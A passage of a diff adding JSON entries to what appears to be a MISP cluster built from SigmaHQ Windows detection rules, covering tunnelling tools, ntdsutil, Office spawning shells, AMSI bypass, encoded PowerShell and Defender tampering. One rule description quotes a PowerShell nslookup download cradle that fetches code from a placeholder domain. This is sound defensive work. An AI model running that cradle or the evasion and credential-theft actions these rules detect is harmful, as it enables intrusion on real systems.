}, + { + "description": "Detects the use of NPS a port forwarding tool", + "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", + "value": "NPS Tunneling Tool", + "meta": { + "refs": [ + "https://github.com/ehang-io/nps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/10/08", + "filename": "proc_creation_win_nps.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", + "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", + "value": "Nslookup PowerShell Download", + "meta": { + "refs": [ + "https://twitter.com/Alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/05", + "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]", + "uuid": "72671447-4352-4413-bb91-b85569687135", + "value": "Nslookup PwSh Download Cradle", + "meta": { + "refs": [ + "https://twitter.com/alh4zr3d/status/1566489367232651264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.t1071.004" + ], + "creation_date": "2022/09/06", + "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", + "author": "Zach Mathis (@yamatosecurity)", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_ntdsutil_usage.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "NTDS maintenance" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", + "value": "Use Short Name Path in Command Line", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/07", + "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", + "value": "Use Short Name Path in Image", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/07", + "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "value": "Use NTFS Short Name in Command Line", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/05", + "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "value": "Use NTFS Short Name in Image", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/08/06", + "filename": "proc_creation_win_ntfs_short_name_use_image.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "value": "Obfuscated IP Download", + "meta": { + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/08/03", + "filename": "proc_creation_win_obfuscated_ip_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "value": "Obfuscated IP Via CLI", + "meta": { + "refs": [ + "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/08/03", + "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", + "value": "Office Applications Spawning Wmi Cli", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", + "value": "Office Directory Traversal CommandLine", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1531653369546301440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "author": "@SBousseaden (idea), Christian Burkard (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "value": "Office Processes Proxy Execution Through WMIC", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_office_proxy_exec_wmic.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio", + "uuid": "438025f9-5856-4663-83f7-52f878a70a50", + "value": "Microsoft Office Product Spawning Windows Shell", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2018/04/06", + "filename": "proc_creation_win_office_shell.yml", + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", + "value": "Office Applications Spawning Wmi Cli Alternate", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", + "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "value": "MS Office Product Spawning Exe in User Dir", + "meta": { + "refs": [ + "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", + "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" + ], + "creation_date": "2019/04/02", + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", + "author": "Jason Lynch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)", + "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "value": "Svchost Spawning Office Application", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic", + "https://github.com/med0x2e/vba2clr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/10/13", + "filename": "proc_creation_win_office_svchost_child.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of office automation via scripting" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook", + "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", + "value": "Microsoft Outlook Product Spawning Windows Shell", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2022/02/28", + "filename": "proc_creation_win_outlook_shell.yml", + "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "value": "Suspicious Execution Of PDQDeployRunner", + "meta": { + "refs": [ + "https://twitter.com/malmoeb/status/1550483085472432128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/22", + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the PDQDeploy tool to execute these commands" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of PDQ Deploy remote admin tool", + "uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "value": "Use of PDQ Deploy Remote Adminstartion Tool", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md", + "https://www.pdq.com/pdq-deploy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdq_deploy.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ], + "creation_date": "2022/10/01", + "filename": "proc_creation_win_pdq_deploy.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "uuid": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "value": "Persistence Via TypedPaths - CommandLine", + "meta": { + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/22", + "filename": "proc_creation_win_persistence_typed_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "value": "Pingback Backdoor", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ], + "creation_date": "2021/05/05", + "filename": "proc_creation_win_pingback_backdoor.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location", + "uuid": "aeab5ec5-be14-471a-80e8-e344418305c2", + "value": "Executable Used by PlugX in Uncommon Location", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/", + "https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml" + ], + "tags": [ + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/06/12", + "filename": "proc_creation_win_plugx_susp_exe_locations.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "value": "Possible Privilege Escalation via Service Permissions Weakness", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574.011" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml", + "author": "Teymur Kheirkhabarov", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "value": "Powershell AMSI Bypass via .NET Reflection", + "meta": { + "refs": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2018/08/17", + "filename": "proc_creation_win_powershell_amsi_bypass.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects audio capture via PowerShell Cmdlet.", + "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "value": "Audio Capture via PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_powershell_audio_capture.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Base64 encoded Shellcode", + "uuid": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", + "value": "PowerShell Base64 Encoded Shellcode", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_b64_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2018/11/17", + "filename": "proc_creation_win_powershell_b64_shellcode.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines", + "uuid": "74403157-20f5-415d-89a7-c505779585cf", + "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the PowerShell command lines with reversed strings", + "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "value": "Suspicious PowerShell Cmdline", + "meta": { + "refs": [ + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the PowerShell command lines with special characters", + "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "value": "Suspicious PowerShell Command Line", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "level": "high", + "falsepositive": [ + "Unlikely", + "Amazon SSM Document Worker", + "Windows Defender ATP" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", + "value": "Encoded PowerShell Command Line", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "low", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", + "value": "Suspicious Xor PowerShell Command Line", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_susp_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/07/06", + "filename": "proc_creation_win_powershell_cmdline_susp_comb_methods.yml", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", + "value": "Powershell Defender Base64 MpPreference", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/03/04", + "filename": "proc_creation_win_powershell_defender_base64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects requests to disable Microsoft Defender features using PowerShell commands", + "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21", + "value": "Powershell Defender Disable Scan Feature", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/03/03", + "filename": "proc_creation_win_powershell_defender_disable_feature.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", + "value": "Powershell Defender Exclusion", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": 